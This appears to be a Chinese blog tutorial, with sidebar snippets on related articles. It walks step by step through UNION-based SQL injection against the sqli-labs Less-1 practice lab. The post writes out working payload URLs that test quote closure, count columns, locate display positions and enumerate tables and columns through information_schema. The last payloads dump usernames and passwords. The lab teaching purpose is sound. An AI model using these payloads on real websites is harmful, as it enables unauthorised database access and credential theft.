简单联合union查询注入

最新推荐文章于 2024-05-29 00:11:31 发布
最新推荐文章于 2024-05-29 00:11:31 发布
阅读量9.1k 收藏 13
点赞数 4
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41630808/article/details/80550132
版权
联合查询有前提  必须有显示位 

用sql-labs来学习
这是第一个
http://127.0.0.1/sqli-labs/Less-1/?id=1

一、判断是否用'做字符串引号
http://127.0.0.1/sqli-labs/Less-1/?id=1'and 1=1 --+ https://blog.csdn.net/qq_41630808/article/details/80570197

正常输出
出错代表没有闭合  说明没有用'  可能没有用' 或用了"或()

http://127.0.0.1/sqli-labs/Less-1/?id=1%27and%201=2--+

则是''字符串注入

二、判断它所在的数据库有几列
http://127.0.0.1/sqli-labs/Less-1/?id=1'order by 3 --+ 判断是否有3列

正常
http://127.0.0.1/sqli-labs/Less-1/?id=1'order by 4 --+ 判断是否有4列

错误
说明它输出的内容所在的数据库有3列

四、判断他显示的内容在数据库的第几列

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+
Your Login name 在第二列 Your Password在第三列
我选择在第二列输出我想要的内容

五、查找出当前用户权限
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+

root权限
六、查找当前数据库
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+

当前数据库是 security
七、查找security的表名
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'),3 --+

表名是 emails,referers,uagents,users
八 、查找users里的字段
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),3 --+


九、查找用户名
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(username) from security.users),3 --+

十、查找密码
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(password) from security.users),3 --+

这样 这个就完成了  已经拿到了账号密码 

vcdy
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入--Oracle
pygain的博客
10-09 1501
1.判断是否为oracle数据库 id=88 and exists(select *from dual) id=88 and exists(select *from user_tables)这两个表都是系统表,返回正常则为oralce数据库 2.查询字段数 order by 4 异常 order by 3 正常   最大列数为3 3.判断字段类型 id=88 unio
union联合查询
qq_41617901的博客
11-01 1009
union:联合查询 应用场景:要查询的结果来自于多个表时,且多个表没有直接的关系时,但查询的信息一不致时 特点: 1.要求多条查询语句的查询的列数是一致的 2.要求多条查询语句的查询的每一列的类型和顺序最好一致 3.union关键字默认去重 案例:查询中国用户中男性的信息和外国用户男性的信息,如果使用union all 可以包含重复项 select id,cname,csex from t_ca where csex='男' union all select id,tName ,tG
Web渗透-MySql-Sql注入联合查询注入
最新发布
WolvenSec的博客
05-29 1258
SQL注入(SQL Injection)是一种网络攻击技术,攻击者通过将恶意的SQL代码插入到应用程序的输入字段,从而欺骗应用程序执行未经授权的操作。这种攻击方式可以导致严重的安全问题,包括:数据泄露:攻击者可以未经授权地访问和检索数据库中的敏感数据。数据篡改:攻击者可以修改、删除或添加数据库中的数据。身份冒充:攻击者可以冒充其他用户,包括管理员,从而获得更高的权限。拒绝服务:通过破坏数据库或使其负载过重,使得数据库无法正常提供服务。
Mysql注入联合查询
一个普普通通的博客
03-01 956
Mysql注入联合查询
Union注入
shenzhang7331的博客
11-18 210
1.http://*id=31 order by 6 注:若6页面正常,7页面不正常,说明有6个字段 2.http://*id=31 and 1=2 union select 1,2,3,4,5,6 注:定位报错字段,若页面显示3 3.http://*id=31 and 1=2 union select 1,2,database(),4,5,6 from information_sch...
2.1 union联合查询注入
n0d_xy的博客
04-14 1309
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
sql注入讲解ppt.pptx
08-10
2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET keyword 来限制查询结果。 八、SQL 注入基本步骤: 1. ...
SQL注入思路详解
12-14
1. **联合查询注入Union Query)**:通过`UNION`操作合并两个或更多查询的结果,直接展示数据库中的数据。 2. **报错注入(Error Based)**:利用错误信息泄露数据库信息,如MySQL的`information_schema.tables`。...
SQL注入天书 sqli-labs
01-11
4. **联合查询注入**:利用UNION操作符合并两个或多个查询,以显示非预期的结果。 5. **堆叠查询注入**:通过构造多条查询语句并用分号分隔,一次性执行多个查询。 6. **信息收集**:学习如何获取数据库版本、表名...
SQL注入漏洞演示源代码
12-19
- **联合查询注入**:利用UNION操作符将恶意查询与正常查询合并。 3. **防御措施**: - **参数化查询/预编译语句**:将用户输入作为参数,而不是直接插入到SQL语句中。 - **输入验证**:对用户输入进行严格的...
SQL注入介绍与原理分析
03-28
2. **联合查询注入**:利用UNION操作符将恶意查询与原始查询合并,返回不同的结果集。 3. **堆叠查询注入**:在一个查询中执行多个SQL命令,通过分号或换行符分隔。 4. **布尔型注入**:通过观察应用程序对查询结果...
sql注入_表名、列名字典
05-06
union select * from 表名字典 union select 列名字典 from 表名
SQL注入---联合查询注入
孤的博客
10-13 932
注入条件 页面有显示位,即在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位。 找的注入点→查询列数→找到显示位→获取列中的信息 注入点:http://192.168.1.3:8008/onews.asp?id=45 查询列数 http://192.168.1.3:8008/onews.asp?id=45 order by 猜测的列...
SQL注入union 联合注入
weixin_53711701的博客
01-16 4342
SQL注入union联合注入
sqli联合注入基本步骤
sfmvp的博客
08-26 330
SQL注入基本步骤 : 1、注入点测试 2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、爆数据库名 6、爆数据库表名 7、爆字段名 8,爆数据 1,注入点判断:/?id=1 and 1=1 2,判断闭合方式:/?id=1' {' ,'), ","),), )).} 注释符:--+ # -- (空格) 3,猜字段数:/?id=1 order by 数字 4,判断显示位:/?id=-1 union select 1,2,3,4,······ 5,根据页面回显...
SQL注入笔记01:基于union注入
ONS_cukuyo的博客
09-14 1189
  (笔记内容来自小迪8,用以方便查看) 以下内容都以(url)?id=3为例,比如www.xx.com?id=3 ****************************************************************** 思路:获取表列数目用以后续查询           -》获取当前查询属于哪个数据库和数据库版本等系统信息           -》查询有哪些数据...
SQL注入union联合注入——sql-lab第一关(非常非常详细的过程)
_Co1a
12-19 2401
SQL注入介绍 什么是SQL注入: SQL注入是(SQLi)是一种注入攻击,可以执行恶意的SQL语句,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或者web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入的原理: 用户输入的数据被当作代码拼接到代码语句里面执行,造成一些不可估量的后果 危害: 你的数据被别人窃取,甚至被别人全部
SQL注入union联合注入
hobby云说
06-12 3592
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
156【连接查询】mySql多表连接查询unionunion all用法
phpstory的博客
04-29 427
https://www.cnblogs.com/qlqwjy/p/7837529.html http://www.cnblogs.com/awzf/p/9803559.html https://blog.csdn.net/qq_37233607/article/details/80390705 unionunion all 查的列必须一样,注意这一点就行了 ...
sql注入union联合查询
05-19
其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值